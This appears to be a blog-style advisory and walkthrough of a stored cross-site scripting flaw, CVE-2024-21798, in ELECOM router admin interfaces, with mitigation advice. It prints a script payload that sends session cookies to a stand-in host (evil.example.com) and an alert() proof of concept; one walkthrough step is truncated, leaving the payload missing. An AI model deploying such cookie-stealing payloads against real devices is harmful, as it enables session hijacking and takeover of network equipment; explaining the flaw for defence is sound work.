CVE-2024-21798 - Cross-Site Scripting (XSS) Vulnerability in ELECOM Wireless LAN Routers (WMC-X180GST-B and e-Mesh WMC-2LX-B) — Detailed Analysis and Exploit Walkthrough

ELECOM wireless LAN routers are widely used in homes and businesses across Japan and other parts of Asia. On February 13, 2024, JPCERT/CC disclosed a critical security flaw affecting these routers, registered as CVE-2024-21798. This vulnerability is a Cross-Site Scripting (XSS) issue that occurs within the routers' administration UI. In this long read, we will break down how this flaw works, who can exploit it, and why it matters—even if you think your network is safe.

What is CVE-2024-21798?

CVE-2024-21798 is a cross-site scripting (XSS) vulnerability present in the web-based administration interface of certain ELECOM wireless LAN routers, especially model WMC-X180GST-B (also bundled within the mesh starter kit WMC-2LX-B).

The core issue:
An attacker with admin credentials can inject modified script code (JavaScript) into the router's management interface. When another admin logs in later, these scripts run inside their web browser, potentially allowing credential theft, UI manipulation, and further attacks on the network.

Who Is at Risk?

- Anyone using the affected router models (see vendor advisory).

Users of the e-Mesh Starter Kit WMC-2LX-B, since it contains the vulnerable device.

Important note:
This vulnerability isn't "remote code execution" for outsiders. The attacker must be an authenticated administrative user—either a rogue admin, an external hacker who phished a password, or a disgruntled employee.

1. Malicious Admin Injects Script

A legitimate (but malicious) admin logs into the router configuration page and sets specially crafted data in one of the configuration fields (for example, the device "name" or a comment field).

<!-- Example malicious payload -->
<script>
  fetch('https://evil.example.com/steal?cookie='+document.cookie);
</script>

This snippet, if embedded somewhere in the UI, will send other users’ session cookies to a remote server.

2. Second Admin Logs In

A second admin (who is not malicious) logs into the same admin web interface to manage settings. Upon viewing or editing the field containing the crafted script, their browser executes it with full admin privileges for the control panel environment.

Session cookies, passwords, or sensitive data may be leaked.

- The attacker can manipulate onscreen settings, attempt to change router config, or prompt the victim to install malware.

Code Snippet: Example Exploit

Let’s assume the router’s "Device Name" field doesn’t sanitize input and simply echoes it back into the HTML page.

Attacker enters

<script>alert('XSS!');</script>

Later, for victim admin

<td>Device Name: <script>alert('XSS!');</script></td>

As soon as the admin loads this page, a JavaScript alert pops up. In real attacks, the script could be used to steal data, not just show alerts.

Gain admin access: The attacker logs in with their own credentials.

2. Insert XSS payload: In the router’s interface, they save their "Device Name" or another display field as:

`

">

Wait: Another admin, unaware, logs in to complete another task.

4. Exploit triggers: The browser loads the config page, the injected image fires, and the victim’s session cookie is stolen by attacker’s server.
5. Persistence / Next Steps: Attacker can now impersonate the admin, make unauthorized changes, or attack the wider network.

## How To Fix / Mitigate

Update Firmware Immediately:

ELECOM Security Bulletin and JPCERT/CC Notice recommend updating to the latest firmware, which adds input validation and output sanitization.

Restrict Admin Access:

Logins should only be trusted to a small, known group. Remove or disable accounts that are no longer needed.

Block unnecessary access to router admin from regular user devices or over WiFi.

## Official References / Further Reading

- JPCERT/CC - JVN#47649579
- ELECOM Vendor Security Advisory (Japanese)
- CVE entry on Mitre

Conclusion

CVE-2024-21798 shows that even "internal" XSS bugs on infrastructure devices matter. If you maintain network equipment for your home, business, or clients, check the affected models (like WMC-X180GST-B and the e-Mesh Starter Kit "WMC-2LX-B") and ensure firmware is up to date. Never assume "trusted users" really are—one compromised admin puts your whole network at risk.

Stay safe—apply updates, audit admin lists, and stay alert for more routers with similar bugs.

*Exclusively written for your security research. Please refer to official advisories linked above for the latest fix and technical details.*

Timeline

Published on: 02/28/2024 23:15:09 UTC
Last modified on: 11/26/2024 08:07:04 UTC